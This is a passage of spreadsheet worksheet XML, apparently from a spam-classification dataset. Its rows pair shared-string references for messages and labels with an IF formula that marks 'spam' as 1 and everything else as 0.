    <row r="4155" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4155" t="s">
        <v>9194</v>
      </c>
      <c r="B4155" t="s">
        <v>5294</v>
      </c>
      <c r="C4155" s="1">
        <f>IF(B4155="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4156" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4156" t="s">
        <v>9195</v>
      </c>
      <c r="B4156" t="s">
        <v>5297</v>
      </c>
      <c r="C4156" s="1">
        <f>IF(B4156="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="4157" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4157" t="s">
        <v>9196</v>
      </c>
      <c r="B4157" t="s">
        <v>5294</v>
      </c>
      <c r="C4157" s="1">
        <f>IF(B4157="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4158" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4158" t="s">
        <v>9197</v>
      </c>
      <c r="B4158" t="s">
        <v>5294</v>
      </c>
      <c r="C4158" s="1">
        <f>IF(B4158="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4159" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4159" t="s">
        <v>9198</v>
      </c>
      <c r="B4159" t="s">
        <v>5294</v>
      </c>
      <c r="C4159" s="1">
        <f>IF(B4159="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4160" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4160" t="s">
        <v>9199</v>
      </c>
      <c r="B4160" t="s">
        <v>5294</v>
      </c>
      <c r="C4160" s="1">
        <f>IF(B4160="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4161" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4161" t="s">
        <v>9200</v>
      </c>
      <c r="B4161" t="s">
        <v>5294</v>
      </c>
      <c r="C4161" s="1">
        <f>IF(B4161="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4162" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4162" t="s">
        <v>5305</v>
      </c>
      <c r="B4162" t="s">
        <v>5297</v>
      </c>
      <c r="C4162" s="1">
        <f>IF(B4162="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="4163" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4163" t="s">
        <v>9201</v>
      </c>
      <c r="B4163" t="s">
        <v>5294</v>
      </c>
      <c r="C4163" s="1">
        <f>IF(B4163="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4164" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4164" t="s">
        <v>9202</v>
      </c>
      <c r="B4164" t="s">
        <v>5294</v>
      </c>
      <c r="C4164" s="1">
        <f>IF(B4164="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4165" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4165" t="s">
        <v>9203</v>
      </c>
      <c r="B4165" t="s">
        <v>5294</v>
      </c>
      <c r="C4165" s="1">
        <f>IF(B4165="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4166" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4166" t="s">
        <v>9204</v>
      </c>
      <c r="B4166" t="s">
        <v>5297</v>
      </c>
      <c r="C4166" s="1">
        <f>IF(B4166="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="4167" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4167" t="s">
        <v>9205</v>
      </c>
      <c r="B4167" t="s">
        <v>5294</v>
      </c>
      <c r="C4167" s="1">
        <f>IF(B4167="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4168" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4168" t="s">
        <v>9206</v>
      </c>
      <c r="B4168" t="s">
        <v>5294</v>
      </c>
      <c r="C4168" s="1">
        <f>IF(B4168="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4169" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4169" t="s">
        <v>5721</v>
      </c>
      <c r="B4169" t="s">
        <v>5297</v>
      </c>
      <c r="C4169" s="1">
        <f>IF(B4169="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="4170" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4170" t="s">
        <v>9207</v>
      </c>
      <c r="B4170" t="s">
        <v>5294</v>
      </c>
      <c r="C4170" s="1">
        <f>IF(B4170="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4171" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4171" t="s">
        <v>9208</v>
      </c>
      <c r="B4171" t="s">
        <v>5294</v>
      </c>
      <c r="C4171" s="1">
        <f>IF(B4171="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4172" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4172" t="s">
        <v>9209</v>
      </c>
      <c r="B4172" t="s">
        <v>5294</v>
      </c>
      <c r="C4172" s="1">
        <f>IF(B4172="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4173" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4173" t="s">
        <v>5376</v>
      </c>
      <c r="B4173" t="s">
        <v>5294</v>
      </c>
      <c r="C4173" s="1">
        <f>IF(B4173="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4174" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4174" t="s">
        <v>9210</v>
      </c>
      <c r="B4174" t="s">
        <v>5294</v>
      </c>
      <c r="C4174" s="1">
        <f>IF(B4174="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4175" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4175" t="s">
        <v>9211</v>
      </c>
      <c r="B4175" t="s">
        <v>5294</v>
      </c>
      <c r="C4175" s="1">
        <f>IF(B4175="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4176" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4176" t="s">
        <v>9212</v>
      </c>
      <c r="B4176" t="s">
        <v>5294</v>
      </c>
      <c r="C4176" s="1">
        <f>IF(B4176="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4177" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4177" t="s">
        <v>9213</v>
      </c>
      <c r="B4177" t="s">
        <v>5294</v>
      </c>
      <c r="C4177" s="1">
        <f>IF(B4177="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4178" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4178" t="s">
        <v>9214</v>
      </c>
      <c r="B4178" t="s">
        <v>5294</v>
      </c>
      <c r="C4178" s="1">
        <f>IF(B4178="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4179" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4179" t="s">
        <v>9215</v>
      </c>
      <c r="B4179" t="s">
        <v>5294</v>
      </c>
      <c r="C4179" s="1">
        <f>IF(B4179="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4180" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4180" t="s">
        <v>9216</v>
      </c>
      <c r="B4180" t="s">
        <v>5294</v>
      </c>
      <c r="C4180" s="1">
        <f>IF(B4180="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4181" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4181" t="s">
        <v>9217</v>
      </c>
      <c r="B4181" t="s">
        <v>5294</v>
      </c>
      <c r="C4181" s="1">
        <f>IF(B4181="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4182" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4182" t="s">
        <v>9218</v>
      </c>
      <c r="B4182" t="s">
        <v>5294</v>
      </c>
      <c r="C4182" s="1">
        <f>IF(B4182="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4183" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4183" t="s">
        <v>9219</v>
      </c>
      <c r="B4183" t="s">
        <v>5297</v>
      </c>
      <c r="C4183" s="1">
        <f>IF(B4183="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="4184" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4184" t="s">
        <v>7485</v>
      </c>
      <c r="B4184" t="s">
        <v>5294</v>
      </c>
      <c r="C4184" s="1">
        <f>IF(B4184="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4185" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4185" t="s">
        <v>9220</v>
      </c>
      <c r="B4185" t="s">
        <v>5294</v>
      </c>
      <c r="C4185" s="1">
        <f>IF(B4185="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4186" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4186" t="s">
        <v>9221</v>
      </c>
      <c r="B4186" t="s">
        <v>5294</v>
      </c>
      <c r="C4186" s="1">
        <f>IF(B4186="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4187" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4187" t="s">
        <v>9222</v>
      </c>
      <c r="B4187" t="s">
        <v>5294</v>
      </c>
      <c r="C4187" s="1">
        <f>IF(B4187="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4188" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4188" t="s">
        <v>9223</v>
      </c>
      <c r="B4188" t="s">
        <v>5294</v>
      </c>
      <c r="C4188" s="1">
        <f>IF(B4188="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4189" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4189" t="s">
        <v>9224</v>
      </c>
      <c r="B4189" t="s">
        <v>5294</v>
      </c>
      <c r="C4189" s="1">
        <f>IF(B4189="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4190" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4190" t="s">
        <v>9225</v>
      </c>
      <c r="B4190" t="s">
        <v>5294</v>
      </c>
      <c r="C4190" s="1">
        <f>IF(B4190="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4191" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4191" t="s">
        <v>5376</v>
      </c>
      <c r="B4191" t="s">
        <v>5294</v>
      </c>
      <c r="C4191" s="1">
        <f>IF(B4191="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4192" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4192" t="s">
        <v>9226</v>
      </c>
      <c r="B4192" t="s">
        <v>5294</v>
      </c>
      <c r="C4192" s="1">
        <f>IF(B4192="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4193" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4193" t="s">
        <v>9227</v>
      </c>
      <c r="B4193" t="s">
        <v>5294</v>
      </c>
      <c r="C4193" s="1">
        <f>IF(B4193="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4194" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4194" t="s">
        <v>9228</v>
      </c>
      <c r="B4194" t="s">
        <v>5294</v>
      </c>
      <c r="C4194" s="1">
        <f>IF(B4194="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4195" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4195" t="s">
        <v>9229</v>
      </c>
      <c r="B4195" t="s">
        <v>5294</v>
      </c>
      <c r="C4195" s="1">
        <f>IF(B4195="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4196" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4196" t="s">
        <v>5673</v>
      </c>
      <c r="B4196" t="s">
        <v>5297</v>
      </c>
      <c r="C4196" s="1">
        <f>IF(B4196="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="4197" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4197" t="s">
        <v>9230</v>
      </c>
      <c r="B4197" t="s">
        <v>5294</v>
      </c>
      <c r="C4197" s="1">
        <f>IF(B4197="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4198" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4198" t="s">
        <v>6288</v>
      </c>
      <c r="B4198" t="s">
        <v>5297</v>
      </c>
      <c r="C4198" s="1">
        <f>IF(B4198="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="4199" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4199" t="s">
        <v>8859</v>
      </c>
      <c r="B4199" t="s">
        <v>5297</v>
      </c>
      <c r="C4199" s="1">
        <f>IF(B4199="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="4200" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4200" t="s">
        <v>9231</v>
      </c>
      <c r="B4200" t="s">
        <v>5297</v>
      </c>
      <c r="C4200" s="1">
        <f>IF(B4200="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="4201" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4201" t="s">
        <v>6976</v>
      </c>
      <c r="B4201" t="s">
        <v>5294</v>
      </c>
      <c r="C4201" s="1">
        <f>IF(B4201="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4202" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4202" t="s">
        <v>9232</v>
      </c>
      <c r="B4202" t="s">
        <v>5294</v>
      </c>
      <c r="C4202" s="1">
        <f>IF(B4202="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4203" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4203" t="s">
        <v>9233</v>
      </c>
      <c r="B4203" t="s">
        <v>5294</v>
      </c>
      <c r="C4203" s="1">
        <f>IF(B4203="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4204" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4204" t="s">
        <v>9234</v>
      </c>
      <c r="B4204" t="s">
        <v>5294</v>
      </c>
      <c r="C4204" s="1">
        <f>IF(B4204="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4205" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4205" t="s">
        <v>9235</v>
      </c>
      <c r="B4205" t="s">
        <v>5294</v>
      </c>
      <c r="C4205" s="1">
        <f>IF(B4205="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4206" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4206" t="s">
        <v>9236</v>
      </c>
      <c r="B4206" t="s">
        <v>5297</v>
      </c>
      <c r="C4206" s="1">
        <f>IF(B4206="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="4207" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4207" t="s">
        <v>9237</v>
      </c>
      <c r="B4207" t="s">
        <v>5294</v>
      </c>
      <c r="C4207" s="1">
        <f>IF(B4207="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4208" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4208" t="s">
        <v>9238</v>
      </c>
      <c r="B4208" t="s">
        <v>5294</v>
      </c>
      <c r="C4208" s="1">
        <f>IF(B4208="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4209" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4209" t="s">
        <v>9239</v>
      </c>
      <c r="B4209" t="s">
        <v>5294</v>
      </c>
      <c r="C4209" s="1">
        <f>IF(B4209="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4210" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4210" t="s">
        <v>9240</v>
      </c>
      <c r="B4210" t="s">
        <v>5294</v>
      </c>
      <c r="C4210" s="1">
        <f>IF(B4210="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4211" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4211" t="s">
        <v>9241</v>
      </c>
      <c r="B4211" t="s">
        <v>5294</v>
      </c>
      <c r="C4211" s="1">
        <f>IF(B4211="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4212" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4212" t="s">
        <v>9242</v>
      </c>
      <c r="B4212" t="s">
        <v>5294</v>
      </c>
      <c r="C4212" s="1">
        <f>IF(B4212="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4213" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4213" t="s">
        <v>9243</v>
      </c>
      <c r="B4213" t="s">
        <v>5297</v>
      </c>
      <c r="C4213" s="1">
        <f>IF(B4213="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="4214" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4214" t="s">
        <v>9244</v>
      </c>
      <c r="B4214" t="s">
        <v>5294</v>
      </c>
      <c r="C4214" s="1">
        <f>IF(B4214="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4215" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4215" t="s">
        <v>9245</v>
      </c>
      <c r="B4215" t="s">
        <v>5294</v>
      </c>
      <c r="C4215" s="1">
        <f>IF(B4215="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4216" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4216" t="s">
        <v>9246</v>
      </c>
      <c r="B4216" t="s">
        <v>5294</v>
      </c>
      <c r="C4216" s="1">
        <f>IF(B4216="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4217" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4217" t="s">
        <v>9247</v>
      </c>
      <c r="B4217" t="s">
        <v>5294</v>
      </c>
      <c r="C4217" s="1">
        <f>IF(B4217="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4218" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4218" t="s">
        <v>9248</v>
      </c>
      <c r="B4218" t="s">
        <v>5294</v>
      </c>
      <c r="C4218" s="1">
        <f>IF(B4218="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4219" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4219" t="s">
        <v>9249</v>
      </c>
      <c r="B4219" t="s">
        <v>5294</v>
      </c>
      <c r="C4219" s="1">
        <f>IF(B4219="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4220" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4220" t="s">
        <v>9250</v>
      </c>
      <c r="B4220" t="s">
        <v>5294</v>
      </c>
      <c r="C4220" s="1">
        <f>IF(B4220="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4221" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4221" t="s">
        <v>9251</v>
      </c>
      <c r="B4221" t="s">
        <v>5294</v>
      </c>
      <c r="C4221" s="1">
        <f>IF(B4221="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4222" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4222" t="s">
        <v>8816</v>
      </c>
      <c r="B4222" t="s">
        <v>5294</v>
      </c>
      <c r="C4222" s="1">
        <f>IF(B4222="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4223" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4223" t="s">
        <v>9252</v>
      </c>
      <c r="B4223" t="s">
        <v>5294</v>
      </c>
      <c r="C4223" s="1">
        <f>IF(B4223="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4224" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4224" t="s">
        <v>9253</v>
      </c>
      <c r="B4224" t="s">
        <v>5294</v>
      </c>
      <c r="C4224" s="1">
        <f>IF(B4224="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4225" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4225" t="s">
        <v>9254</v>
      </c>
      <c r="B4225" t="s">
        <v>5294</v>
      </c>
      <c r="C4225" s="1">
        <f>IF(B4225="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4226" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4226" t="s">
        <v>9255</v>
      </c>
      <c r="B4226" t="s">
        <v>5294</v>
      </c>
      <c r="C4226" s="1">
        <f>IF(B4226="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4227" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4227" t="s">
        <v>9256</v>
      </c>
      <c r="B4227" t="s">
        <v>5294</v>
      </c>
      <c r="C4227" s="1">
        <f>IF(B4227="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4228" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4228" t="s">
        <v>9257</v>
      </c>
      <c r="B4228" t="s">
        <v>5294</v>
      </c>
      <c r="C4228" s="1">
        <f>IF(B4228="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4229" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4229" t="s">
        <v>9258</v>
      </c>
      <c r="B4229" t="s">
        <v>5294</v>
      </c>
      <c r="C4229" s="1">
        <f>IF(B4229="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4230" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4230" t="s">
        <v>9259</v>
      </c>
      <c r="B4230" t="s">
        <v>5294</v>
      </c>
      <c r="C4230" s="1">
        <f>IF(B4230="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4231" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4231" t="s">
        <v>9260</v>
      </c>
      <c r="B4231" t="s">
        <v>5294</v>
      </c>
      <c r="C4231" s="1">
        <f>IF(B4231="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4232" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4232" t="s">
        <v>9261</v>
      </c>
      <c r="B4232" t="s">
        <v>5294</v>
      </c>
      <c r="C4232" s="1">
        <f>IF(B4232="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4233" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4233" t="s">
        <v>8631</v>
      </c>
      <c r="B4233" t="s">
        <v>5294</v>
      </c>
      <c r="C4233" s="1">
        <f>IF(B4233="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4234" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4234" t="s">
        <v>9262</v>
      </c>
      <c r="B4234" t="s">
        <v>5294</v>
      </c>
      <c r="C4234" s="1">
        <f>IF(B4234="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4235" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4235" t="s">
        <v>6365</v>
      </c>
      <c r="B4235" t="s">
        <v>5294</v>
      </c>
      <c r="C4235" s="1">
        <f>IF(B4235="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4236" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4236" t="s">
        <v>9263</v>
      </c>
      <c r="B4236" t="s">
        <v>5297</v>
      </c>
      <c r="C4236" s="1">
        <f>IF(B4236="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="4237" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4237" t="s">
        <v>7336</v>
      </c>
      <c r="B4237" t="s">
        <v>5297</v>
      </c>
      <c r="C4237" s="1">
        <f>IF(B4237="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="4238" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4238" t="s">
        <v>9264</v>
      </c>
      <c r="B4238" t="s">
        <v>5294</v>
      </c>
      <c r="C4238" s="1">
        <f>IF(B4238="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4239" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4239" t="s">
        <v>9265</v>
      </c>
      <c r="B4239" t="s">
        <v>5294</v>
      </c>
      <c r="C4239" s="1">
        <f>IF(B4239="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4240" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4240" t="s">
        <v>9266</v>
      </c>
      <c r="B4240" t="s">
        <v>5294</v>
      </c>
      <c r="C4240" s="1">
        <f>IF(B4240="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4241" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4241" t="s">
        <v>9267</v>
      </c>
      <c r="B4241" t="s">
        <v>5294</v>
      </c>
      <c r="C4241" s="1">
        <f>IF(B4241="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4242" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4242" t="s">
        <v>9268</v>
      </c>
      <c r="B4242" t="s">
        <v>5294</v>
      </c>
      <c r="C4242" s="1">
        <f>IF(B4242="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4243" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4243" t="s">
        <v>9269</v>
      </c>
      <c r="B4243" t="s">
        <v>5297</v>
      </c>
      <c r="C4243" s="1">
        <f>IF(B4243="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="4244" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4244" t="s">
        <v>5575</v>
      </c>
      <c r="B4244" t="s">
        <v>5294</v>
      </c>
      <c r="C4244" s="1">
        <f>IF(B4244="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4245" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4245" t="s">
        <v>9270</v>
      </c>
      <c r="B4245" t="s">
        <v>5294</v>
      </c>
      <c r="C4245" s="1">
        <f>IF(B4245="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4246" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4246" t="s">
        <v>9271</v>
      </c>
      <c r="B4246" t="s">
        <v>5294</v>
      </c>
      <c r="C4246" s="1">
        <f>IF(B4246="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4247" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4247" t="s">
        <v>9272</v>
      </c>
      <c r="B4247" t="s">
        <v>5294</v>
      </c>
      <c r="C4247" s="1">
        <f>IF(B4247="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4248" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4248" t="s">
        <v>9273</v>
      </c>
      <c r="B4248" t="s">
        <v>5297</v>
      </c>
      <c r="C4248" s="1">
        <f>IF(B4248="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="4249" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4249" t="s">
        <v>9274</v>
      </c>
      <c r="B4249" t="s">
        <v>5297</v>
      </c>
      <c r="C4249" s="1">
        <f>IF(B4249="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="4250" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4250" t="s">
        <v>9275</v>
      </c>
      <c r="B4250" t="s">
        <v>5294</v>
      </c>
      <c r="C4250" s="1">
        <f>IF(B4250="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4251" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4251" t="s">
        <v>9276</v>
      </c>
      <c r="B4251" t="s">
        <v>5294</v>
      </c>
      <c r="C4251" s="1">
        <f>IF(B4251="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4252" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4252" t="s">
        <v>9277</v>
      </c>
      <c r="B4252" t="s">
        <v>5294</v>
      </c>
      <c r="C4252" s="1">
        <f>IF(B4252="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4253" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4253" t="s">
        <v>9278</v>
      </c>
      <c r="B4253" t="s">
        <v>5294</v>
      </c>
      <c r="C4253" s="1">
        <f>IF(B4253="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4254" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4254" t="s">
        <v>9279</v>
      </c>
      <c r="B4254" t="s">
        <v>5294</v>
      </c>
      <c r="C4254" s="1">
        <f>IF(B4254="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4255" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4255" t="s">
        <v>9280</v>
      </c>
      <c r="B4255" t="s">
        <v>5294</v>
      </c>
      <c r="C4255" s="1">
        <f>IF(B4255="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4256" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4256" t="s">
        <v>9281</v>
      </c>
      <c r="B4256" t="s">
        <v>5297</v>
      </c>
      <c r="C4256" s="1">
        <f>IF(B4256="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="4257" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4257" t="s">
        <v>9282</v>
      </c>
      <c r="B4257" t="s">
        <v>5294</v>
      </c>
      <c r="C4257" s="1">
        <f>IF(B4257="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4258" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4258" t="s">
        <v>9283</v>
      </c>
      <c r="B4258" t="s">
        <v>5297</v>
      </c>
      <c r="C4258" s="1">
        <f>IF(B4258="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
